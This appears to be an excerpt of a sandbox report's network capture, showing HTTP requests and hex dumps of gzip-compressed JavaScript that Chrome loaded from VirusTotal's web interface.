                                                                                                                                                                                                                    Data Ascii: glw;<A_mx,+h3'Gf_d4ghsii3KGVOOp}Ug9Z]w;hzrrP2+_\Gb!t|</P`gx0,pr=[Lv-;jh/0SMVYWNvPThp4|}Ve
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 31 30 30 30 0d 0a 1e c7 8c b2 af f4 4f 41 8f 1b 7a fc 9c 7f 0a 9a 7e 41 bd 9e eb 9f 82 9e 1a fa d8 fe 57 d0 33 43 1f 4d f4 4f 41 cf 0d 7d af 85 0b 43 4f 4f f4 4f a1 5e 1a fa 5e bb 57 86 1e 1d ea 9f 46 dd bd 66 b4 af 0e 32 6b 9e 76 37 ea 7a e1 b6 4c 39 11 0e 17 47 de 11 b4 da 39 8b b8 ba 57 c6 ef 44 63 7a 05 b2 8e 74 af 69 e7 ea c5 d1 de 60 34 da 1e 2c 16 db 83 f1 68 d9 da d1 6b 6c bf ce f8 65 b4 18 43 d2 f9 a5 9a db 4f 43 7e 19 4f c8 38 e9 b2 d2 5b d0 7e 1d 8f 57 fc 3e 9a 6d 0f fa af ad 25 bd ce 15 c5 4e e6 fc eb 52 db 3c 86 b8 17 f1 7d ad 5f 5d 62 4f 9c aa cf c3 f9 f8 68 d1 c7 35 bc 61 f7 a8 c6 2b fd b3 d9 fa bb 25 8d 87 f3 e1 38 26 0e 7d b8 4b 30 1c 4e a7 cb 3b 3d b9 4b b3 1c 22 29 9b fd b9 4b 32 3f 19 11 cc d4 da c2 69 dc cb 9b 7b 15 55 09 91 54 7f 94
                                                                                                                                                                                                                    Data Ascii: 1000OAz~AW3CMOA}COOO^^WFf2kv7zL9G9WDczti`4,hkleCOC~O8[~W>m%NR<}_]bOh5a+%8&}K0N;=K")K2?i{UT
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: cb e1 83 4d bb 7e fd e2 1d eb 98 1d 7b ec 58 50 c5 de 2b a2 30 cf d6 ef db b1 11 93 a0 a8 57 22 c6 fb 69 92 4d 74 ab 7f af cd 79 4e d3 4e 09 03 da 7a c7 61 84 e4 32 48 fb 50 20 d2 26 1e dd 98 f3 46 a5 c8 38 46 99 dd 1a eb 38 6f 8b f5 20 a3 1f 8d b7 7f b4 b8 86 d6 aa 3f bd c3 63 78 cd f8 5d 72 10 c6 0c ee f9 b6 ff a8 63 f6 7d a7 d9 e1 8e cc 17 a7 37 3b f8 fa 30 58 75 b4 b2 d7 7e f2 be 89 c9 7b b8 b7 0e e9 cf c9 d6 66 ee d6 e5 f8 f1 6e 85 7b 7b 28 82 3f 63 b6 4a 87 9e 12 0d 7f e5 e2 49 ff 3b 2b 2d 98 88 72 10 0c c8 7b 63 14 e3 7e c3 99 c6 0e ca e5 66 e7 f9 e9 fa ec e4 7a 47 81 a0 44 0a 6c 7f 88 4c fc f8 e0 8f cc 5f bc cc 1f fc f9 25 7b 86 56 cf 07 49 4e 0e 31 c0 d5 92 0f 52 b0 19 b8 79 f9 15 34 6f b5 2b b0 62 92 15 a5 e3 c6 a4 9d 6b 8e 6b 76 da 28 bc eb 96
                                                                                                                                                                                                                    Data Ascii: M~{XP+0W"iMtyNNza2HP &F8F8o ?cx]rc}7;0Xu~{fn{{(?cJI;+-r{c~fzGDlL_%{VIN1Ry4o+bkkv(
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1288INData Raw: c9 d3 d7 2a d3 89 1f 2a 92 f3 a9 7e d0 dd 55 ff 8b dc 94 8c ee 1b 51 9b 2e 46 3f 22 bf e3 5f a4 4c 5f 5c b6 36 da cf 0f 1b 77 b8 be 45 95 d1 97 76 b0 56 dd 9a 1f ac 76 f3 de 1a 2b 7c f5 0d a2 4a 36 da a8 fb 3f ef fe 8c 25 cc a5 f9 3d ae 54 55 01 d5 5a b2 c9 2d 10 5d 77 e7 22 ab 13 58 ad d7 b1 4f 96 fe fe 18 e3 b8 03 9b b4 1b da 3c 0b a5 a2 8d 32 37 56 d5 0d 32 6b 4f 29 d1 4d dd 8f b7 61 b8 bb bc 9f e7 c3 6d f1 42 4b 9e fb 8b 71 34 ab ca 49 76 75 73 55 0e 62 31 f9 6e 1f 7c 21 76 46 e6 56 a9 16 ad 43 9a f9 a0 8a dc bd ca 36 0d 8a 8d 3a a3 8e d2 a7 8e f3 a5 5d 0b 53 16 19 2b f0 3d 09 78 a0 07 41 fc 55 c2 30 dc cd 43 34 ca c9 7c 1f 1e 8c a4 61 0d be 6b d3 bb ed 1e 12 f6 21 b6 df 13 db 60 48 f1 f6 6b 70 1e 18 7b 27 fd 70 1b 9d a2 ce 8b bb 3b 94 76 58 5d f6 58
                                                                                                                                                                                                                    Data Ascii: **~UQ.F?"_L_\6wEvVv+|J6?%=TUZ-]w"XO<27V2kO)MamBKq4IvusUb1n|!vFVC6:]S+=xAU0C4|ak!`Hkp{'p;vX]X
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a fd 0d 0a 30 30 30 30 30 30 30 31 0d 0a 81 0d 0a 30 30 30 30 30 30 30 31 0d 0a 9a 0d 0a 30 30 30 30 30 30 30 31 0d 0a c2 0d 0a 30 30 30 30 30 30 30 31 0d 0a 05 0d 0a 30 30 30 30 30 30 30 31 0d 0a de 0d 0a 30 30 30 30 30 30 30 31 0d 0a b5 0d 0a 30 30 30 30 30 30 30 31 0d 0a 19 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 26 0d 0a 30 30 30 30 30 30 30 31 0d 0a c4 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8a 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 26 0d 0a 30 30 30 30 30 30 30 31 0d 0a df 0d 0a 30 30 66 66 31 0d 0a 4f d3 a5 03 36 59 3b 9e de 65 ed 62 77 38 1f b5 95 6b 90 5f 6c b8 37 99 7a 51 3c 74 f0 1d 58 7b 77 e1 62 21 59 ad 3e e3 fa 11 0b d3 9c 8b ed f0 75 a2 c5 a8 fd
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001L00000001&000000010000000100000001L00000001&0000000100ff1O6Y;ebw8k_l7zQ<tX{wb!Y>u
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 0b 01 a6 bc 25 b4 96 a6 d9 4b 26 f2 72 32 a3 ba 8d ee d1 df 05 e5 33 1b d5 8d e9 88 f6 b3 fc 2d 98 7d 6a 16 05 62 3c cb c0 b1 d1 9c cf c5 50 d2 3c d4 a6 e1 5b 4c a7 f0 87 34 33 59 c3 b7 44 5a f9 1d e5 0c ff 18 b5 e9 72 89 d9 22 7b 0e 83 50 32 81 d0 d0 00 d4 2c c5 c9 aa 5c 58 6f 97 b8 a0 48 4e 26 68 41 f5 76 c6 28 f3 87 e1 6b e9 09 56 25 ad 61 f8 44 8f 54 a8 f7 a8 9a e1 52 bf a3 3b 98 67 30 79 3a 95 39 06 b0 14 f7 60 fa 6a 8c 30 6d f6 8e ee 32 fe 98 98 62 1f dc 97 74 a2 5e 69 36 69 c4 88 e6 22 0f 53 49 ab 89 51 4b cf 97 48 2b 8b c1 18 dd a2 df 57 88 83 ea a5 1e 15 37 a4 f7 b4 6f 2e 77 da 0c 5d c6 a0 91 9c 8e 26 ab 67 5a 1b 46 30 91 dc 8c bd dc 65 58 37 fa 5d 42 89 b5 a3 b4 b4 8b 4c b6 c9 bc a5 a5 87 69 cd 84 19 67 f4 13 0d be 26 98 16 13 ca 1b ab 7b 08 cb
                                                                                                                                                                                                                    Data Ascii: %K&r23-}jb<P<[L43YDZr"{P2,\XoHN&hAv(kV%aDTR;g0y:9`j0m2bt^i6i"SIQKH+W7o.w]&gZF0eX7]BLig&{
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: c8 b1 1b 6f cd 8b 8d c0 1c dc cc 70 83 cc 07 13 3c fa 1c eb 10 3e 64 c4 3a cb 53 7e fe 52 87 8e d5 04 52 cd 30 28 05 b7 fc 06 11 50 b1 92 9b 84 03 8d c5 82 86 e0 5d 5b 4a ad e3 aa 9f 8b 9d 6c ef 96 a3 d5 c1 54 0e 76 1b 6e b9 4a d4 1a 86 03 5f ec 54 ae 6d 6c 70 f5 58 a7 9f 9d dd 0c 34 62 61 e1 95 08 fd 52 c3 a8 23 3f 0d 07 e6 94 e8 37 19 d2 bc c4 f7 62 55 be ad 58 73 76 2e 91 55 9f 86 12 6b f6 dc 1c 8e e0 ec e6 f0 53 cc e6 10 93 36 70 ca 0f b3 68 9f 20 04 9b 9e d2 42 61 9b 60 73 58 c3 8e d7 60 4e a6 e1 77 97 6d 51 39 f5 84 11 6a 65 00 d1 6b b6 c9 ca a3 71 c3 13 23 f1 b6 32 e5 95 b1 32 84 c5 c9 c4 e1 0c f9 74 fc a3 69 06 af 86 8a e3 c4 c1 2e ce 8b e3 72 53 d1 7a 13 68 9c fc 1c ed 2a bd d2 3e 5a a7 10 c8 9e e2 59 d9 3c 5b 9a 83 4c 0e 19 74 50 89 48 e9 68 84
                                                                                                                                                                                                                    Data Ascii: op<>d:S~RR0(P][JlTvnJ_TmlpX4baR#?7bUXsv.UkS6ph Ba`sX`NwmQ9jekq#22ti.rSzh*>ZY<[LtPHh


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    88192.168.2.164981574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC688OUTGET /gui/9013.46aa6f2a33218f146fc9.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0; _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 80b053ceefc9fb64dffd34ddd373a484
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:49:59 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:49:59 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36318
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 77 0d 0a 30 30 30 30 30 30 30 31 0d 0a db 0d 0a 30 30 30 30 30 30 30 31 0d 0a 46 0d 0a 30 30 30 30 30 30 30 31 0d 0a 92 0d 0a 30 30 30 30 30 30 30 31 0d 0a fd 0d 0a 30 30 30 30 30 30 30 31 0d 0a be 0d 0a 30 30 30 30 66 65 64 0d
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001\00000001k00000001w0000000100000001F0000000100000001000000010000fed
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: ca 58 d5 74 e6 ff f4 1d 19 b1 49 ad 53 96 79 07 7d d9 78 97 41 16 25 41 56 c1 44 a7 6a 10 a9 34 9a 86 98 66 e2 c9 7a 7f f7 bd 5d d5 e6 23 fc 52 04 45 b8 f8 39 28 82 65 e9 07 ab 15 94 c4 ee 68 7d eb 68 76 15 25 f7 0b ed 7f d1 13 fb 65 5d 24 3b 9d 35 e3 ef 72 07 64 aa fc 1e 4e 3a 9b db a4 97 6c c9 c5 cd af 5f 6d aa ed 8d 26 31 fd 6a 53 6c 7f 1d 57 db ed 64 65 7f 80 d4 4b 7f a5 bc 17 a4 4e 1e 6a fc e7 3c 4f 45 90 6d 9d 8f ee 9c 2a ab 9c 8a dd 8e 5e 92 8e fb 98 27 91 05 17 7c 8c 82 64 62 8f 80 e6 e1 1d c4 fb 4f 93 90 32 fb 1f 13 68 e4 d6 90 9a 4f f5 84 c2 75 59 e5 4b e5 5f 1c 9b 34 c2 9b ad ab 0a ee ae 43 62 71 b6 2e c7 1b 23 66 55 3e 9c 3e d4 d3 8f e0 1f 37 8d 6b 1b db 88 68 b9 e1 eb b6 0e 07 20 8a 6f 32 7c 6d 5d 0a 86 47 49 fd f0 fa c7 6f 6f 5f ff f8 ee 97
                                                                                                                                                                                                                    Data Ascii: XtISy}xA%AVDj4fz]#RE9(eh}hv%e]$;5rdN:l_m&1jSlWdeKNj<OEm*^'|dbO2hOuYK_4Cbq.#fU>>7kh o2|m]GIoo_
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: b7 19 90 1c 36 0d a4 0d 19 fc c4 a9 5c 6b 2c cb 0a db 7a 48 35 c2 c6 7b 3d 5b 42 5d 75 94 65 30 a6 35 76 c7 03 53 18 ae 60 48 02 16 22 1e b1 8d fd 56 c4 c1 3a 85 ef a7 bd 54 95 af c0 dd 2a 98 b3 5f 42 59 41 1e ac 8e ae 64 ca 41 84 55 9c be ea 2a 53 4c a6 1b e2 0c 66 a6 73 3c b0 ea 82 43 21 bb 2f 4c e1 90 69 33 3a 75 f5 0c ea ae 25 ba ea c2 bd ee 86 a9 ca ee 48 e0 60 0a c5 b8 f0 0f 60 86 ed 84 a6 1a 4c a8 b2 01 0d c8 e6 24 d8 eb 55 2b f6 20 70 37 48 ee 14 2c 7e ed 6f 4d 86 03 ed 1c 02 09 a7 9d 89 0c 60 fb d1 3e 51 88 59 03 d8 3a 54 b6 c4 af 16 a8 72 39 bd 55 f8 9f f1 e7 ae 1c 29 f5 ff f6 83 bf e6 80 42 5e 44 06 09 2c 51 0b ae 6f 10 6f 82 b1 40 70 43 42 4f e1 88 6a ca 5d c3 35 d2 34 19 74 5e 14 a6 5b 46 0a 0d 19 b8 2a 79 cd 71 d5 a1 1d 44 1d 9a 45 f5 7e f5
                                                                                                                                                                                                                    Data Ascii: 6\k,zH5{=[B]ue05vS`H"V:T*_BYAdAU*SLfs<C!/Li3:u%H``L$U+ p7H,~oM`>QY:Tr9U)B^D,Qoo@pCBOj]54t^[F*yqDE~
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC467INData Raw: 87 b2 10 52 d1 ad 2b b9 cc 2a 50 49 85 26 35 03 9c 81 b5 70 a0 66 ed df 6f c0 56 d1 51 66 c1 c4 91 f6 80 79 86 c8 24 ce a1 fc e4 e4 a8 3f 9d ba d6 1a 29 71 41 e7 5a a7 aa 61 db cd b9 ac b6 b7 7d 4d 36 b9 c6 91 30 12 25 7c 34 c6 26 57 c2 93 00 7c 78 38 91 d6 dc 48 0f 51 af 9f 3e af 56 e7 d4 70 0d fa 60 b1 e6 92 03 3e 14 ef ea 54 52 6e f4 07 11 ae 58 d2 51 39 fb 49 49 59 3e 9b fb 63 55 62 26 ad 0f 34 7a c5 34 5a fd 38 1f ab 8a b5 50 9a fc 3d 32 1c 72 23 fa 8e b3 3d 3e 8b 59 44 fa 50 5a 65 15 6a 9f 6a c4 02 b9 85 d9 c7 b4 2f f0 ac 2f 8c 69 8d 70 65 5e 11 b0 96 2f 74 ea de 5e 37 03 ae 74 ae 7f 22 bc 61 1c c1 d7 0b 68 9c 59 5a 35 fc a7 2b 0e ac 0a 54 24 f3 f3 7b 05 7a 77 51 b7 45 f4 37 88 e9 c5 c0 22 18 11 ce cc c0 62 2f 78 20 ab 6c ee dc c5 8d d8 3b 07 90 2b
                                                                                                                                                                                                                    Data Ascii: R+*PI&5pfoVQfy$?)qAZa}M60%|4&W|x8HQ>Vp`>TRnXQ9IIY>cUb&4z4Z8P=2r#=>YDPZejj//ipe^/t^7t"ahYZ5+T${zwQE7"b/x l;+
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 98 0d 0a 30 30 30 30 30 30 30 31 0d 0a 88 0d 0a 30 30 30 30 30 30 30 31 0d 0a 27 0d 0a 30 30 30 30 30 30 30 31 0d 0a ba 0d 0a 30 30 30 30 30 30 30 31 0d 0a 91 0d 0a 30 30 30 30 30 30 30 31 0d 0a 71 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 89 0d 0a 30 30 30 30 30 30 30 31 0d 0a 24 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 53 0d 0a 30 30 30 30 30 30 30 31 0d 0a a3 0d 0a 30 30 30 30 30 30 30 31 0d 0a 24 0d 0a 30 30 30 30 30 30 30 31 0d 0a f0 0d 0a 30 30 30 30 30 30 30 31 0d 0a f4 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1e 0d 0a 30 30 30 30 30 30 30 31 0d 0a b7 0d 0a 30 30 30 30 30 30 30 31 0d 0a 33 0d 0a 30 30 30 30 30 30 30 31 0d 0a e8 0d 0a 30 30 30 30 30 30 30 31
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001'000000010000000100000001q00000001O0000000100000001$00000001\00000001S0000000100000001$000000010000000100000001000000010000000130000000100000001
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 67 ad 90 d2 ef d2 51 dd d8 c2 01 5b a2 40 8d 6a af 47 11 03 31 d2 fe d8 ac f2 80 b1 b3 32 5d d3 3b 0a 63 69 b4 e4 8d e4 7f 7e ef 62 50 1b 20 8f 43 0e 60 8d 88 df f5 cf 2e 06 86 11 1a 95 5e b9 a4 fa fe b1 ea 14 d6 d3 f5 8f d5 3e 03 9d 9a d6 6d 12 c6 31 de d8 ea 1f 19 b5 4f 95 b5 17 51 53 94 ec 7a e8 78 68 1a de 0a f7 ef c6 d6 a0 6b 90 7c f6 ca 45 10 11 94 ee 2a 2e 99 9d 7d c9 34 82 d1 5d e4 c4 d1 ab c7 73 d7 32 d8 eb da 35 84 5a f7 65 a9 c8 a1 ce c0 ce 5e 27 73 25 ea 4e 09 76 30 58 35 fe 07 fc 42 29 ac 3e fe 67 af 6c ac 62 33 20 df 0e f4 e8 4a 9f a7 14 a9 b5 50 46 35 ae f5 84 38 59 93 2b 29 55 cd a8 55 5a c5 03 19 ba 0f ad c1 ba 2b 51 73 56 15 09 9c 24 aa 0d c1 84 c6 46 b5 a9 8f f0 ac 7b ad 12 79 a9 a9 26 63 62 64 26 a3 1b ec 10 92 ed b6 df b8 df 8c c7 33
                                                                                                                                                                                                                    Data Ascii: gQ[@jG12];ci~bP C`.^>m1OQSzxhk|E*.}4]s25Ze^'s%Nv0X5B)>glb3 JPF58Y+)UUZ+QsV$F{y&cbd&3
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC417INData Raw: d6 13 be b1 2d 2f 65 d0 b6 1c 13 9c 30 c2 f0 70 46 b9 2c c7 0a 67 c8 22 fa 02 8e 31 84 2e b0 d7 d9 fa f2 ca cf 3e b5 71 cf ea f1 2d c4 5d da d0 19 5c 2a 57 e4 db b4 1a fa ea 0b 3e 36 4d 89 e2 c1 7a 95 2c e9 b5 34 7c af c5 d6 e7 5b e1 1b fc 1e 73 f2 6b af ee 8c eb 28 f7 d5 aa a2 af 03 d9 30 b4 93 7b 02 b9 c1 68 35 61 8c d5 7c ff c7 86 ff 6e d6 bb a9 69 f5 62 6c 42 df 5b 02 87 6c 64 d9 8c e0 65 16 73 0e ad d5 9f 6c 7e e7 bb 50 f6 bc 58 ed 09 d5 31 91 81 ed db 4e a7 6e 48 54 d9 50 8d a6 2d df d6 b4 94 79 f7 bd 76 64 c5 4d a3 a3 e4 3e 33 7e 03 4a e4 61 05 68 68 27 05 da 8c fa 9b 11 f4 01 98 44 fb 5d 7f 68 39 86 98 9a 4d 5a ed 43 94 1b aa 59 dc 17 4d dd f4 f7 3a a4 3d 9a 12 27 49 e6 9b c5 51 93 d9 65 44 1d 64 18 02 35 66 5d 93 36 c2 06 b0 c4 9e 80 5a 0e b2 d5
                                                                                                                                                                                                                    Data Ascii: -/e0pF,g"1.>q-]\*W>6Mz,4|[sk(0{h5a|niblB[ldesl~PX1NnHTP-yvdM>3~Jahh'D]h9MZCYM:='IQeDd5f]6Z
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    89192.168.2.164981674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC702OUTGET /gui/vt-ui-sw-installer.c228b2b19bd8517cfe55.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0; _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: f7b7115f303e525feac1a7d8f5dba738
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 13:52:50 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 13:52:50 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 540147
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 31 0d 0a 00 0d 0a 66 34 65 0d 0a 00 00 00 02 ff 94 5a 6d 73 db 36 12 fe 7e bf 82 e6 75 34 e4 85 42 64 a7 4e 62 29 b4 ce 4d 33 37 9e 6b ef 32 55 72 9e a9 eb 73 21 12 92 10 53 a0 0e 84 a4 b8 12 ff fb 3d 0b f0 cd 96 dd eb cd 74 62 8a 04 b0 2f d8 7d f6 c1 a2 fe ba 10 5e 61 b4 4c 8c 3f 0a 0a 91 cd d8 56 4c 57 3c b9 7b bf 58 ab bb 8d b9 5d cb db 25 97 2a fe 9d 6f fb fd f5 4d c8 56 eb 62 11 5c 5f 9f 9d 9e 1e 9f dc 44 bb e3 37 6f 5f 9f 0c 03 15 99 48 84 f1 f9 4e 30 1d 98 30 12 2c 0d 4c b4 fb 97 f9 2c 27 db 4b 55 18 9e 65 42 0f 03 0c b9 28 c3 91 08 8e df 1c bf 0d 47 1b ae 3d 1d 8b e0 cd e9 db b3 b3 30 92 f4
                                                                                                                                                                                                                    Data Ascii: 0000000100000001000000010000000101f4eZms6~u4BdNb)M37k2Urs!S=tb/}^aL?VLW<{X]%*oMVb\_D7o_HN00,L,'KUeB(G=0
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: ce 02 60 3c a9 96 c6 3b 52 64 e8 4f fe 7e f9 f1 f6 ea e2 f2 d3 e5 3f fe e6 77 e4 cf 9d 1f 90 f4 47 a6 4e f2 46 6e bd fa 2c 1c 3e 96 1e da e5 57 1d cb 9d 33 61 4b eb 64 d4 36 32 8d 14 d1 91 ac 1d eb 12 cc 01 00 42 68 57 86 51 00 64 74 a0 41 1e a2 b4 a3 3f 4c 29 7c 05 fe 1a 15 0f f0 47 2b bb 01 6b 3c 8a f6 31 6f 1f d7 6e 1c 77 6f 00 15 18 99 a8 56 c7 3a 9a 34 9b c1 eb 10 69 f3 24 cb 80 75 28 25 46 9d 0f 50 37 b2 c0 b0 22 d1 72 65 b0 fb 58 a0 80 8b 2b 5c 0b 08 11 50 16 80 e9 4b 9b 5e 2a df 06 e1 b9 66 6b f5 e2 b5 f8 76 8c 8a b2 41 ac da a0 5b e6 1b f1 61 03 44 fa 41 16 46 28 81 ec 5d af 50 0b c5 2c 07 84 fb 56 b3 30 1c 62 ca 82 a6 68 c6 15 e3 29 68 40 88 67 dd 84 30 7e 87 d1 8b 17 a4 5d 64 68 c0 a3 35 91 e7 46 24 28 c6 73 41 6b 66 88 02 fb a7 35 1a 90 4e 1b
                                                                                                                                                                                                                    Data Ascii: `<;RdO~?wGNFn,>W3aKd62BhWQdtA?L)|G+k<1onwoV:4i$u(%FP7"reX+\PK^*fkvA[aDAF(]P,V0bh)h@g0~]dh5F$(sAkf5N
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: dc e3 e9 ec ec 6c 70 12 46 53 3c 9e 9c bd 39 41 63 73 42 6f df 7c fb fa 55 38 82 ed de 87 e8 2e 56 f1 b9 6a 0f 96 1f dd a9 39 c2 a9 32 ca 41 f3 2d 3c 51 ce 15 e8 48 e4 37 01 0f 41 8c 0a 67 d2 41 76 d9 04 42 67 32 2c 0b 6b 3f ce db c9 e1 01 37 a9 2a 14 44 74 0e d6 57 98 56 c3 78 1d 31 88 17 12 6d ac e7 e1 ef 86 98 d6 41 f2 34 75 a1 85 ed c4 1c 81 55 51 54 9c 96 5b 23 d1 0a 0d 77 1f 83 dc 5a c9 c1 f5 7c ea ab 58 2a 53 8b f6 68 1f 1e 8e b1 19 69 07 f1 8a e9 d9 b2 65 43 f8 4b 27 62 a8 eb 80 a6 a6 d5 00 4e 6c b5 ae 88 36 4e 82 f9 bb 57 63 33 74 5d c5 58 8f 75 cd 5b b1 af ff dc aa 8f 55 87 f4 7b e1 80 12 fd 29 3a ed 0f b5 6d 53 ba 9e 52 db 30 fb 49 cc 32 b0 6b 30 be 5a f7 83 6f e8 bc a2 33 44 a4 8f c7 d5 f0 e6 55 bd df 68 9a 66 e8 cd d7 e1 8d ed ae d4 ed 1f 8f
                                                                                                                                                                                                                    Data Ascii: lpFS<9AcsBo|U8.Vj92A-<QH7AgAvBg2,k?7*DtWVx1mA4uUQT[#wZ|X*ShieCK'bNl6NWc3t]Xu[U{):mSR0I2k0Zo3DUhf
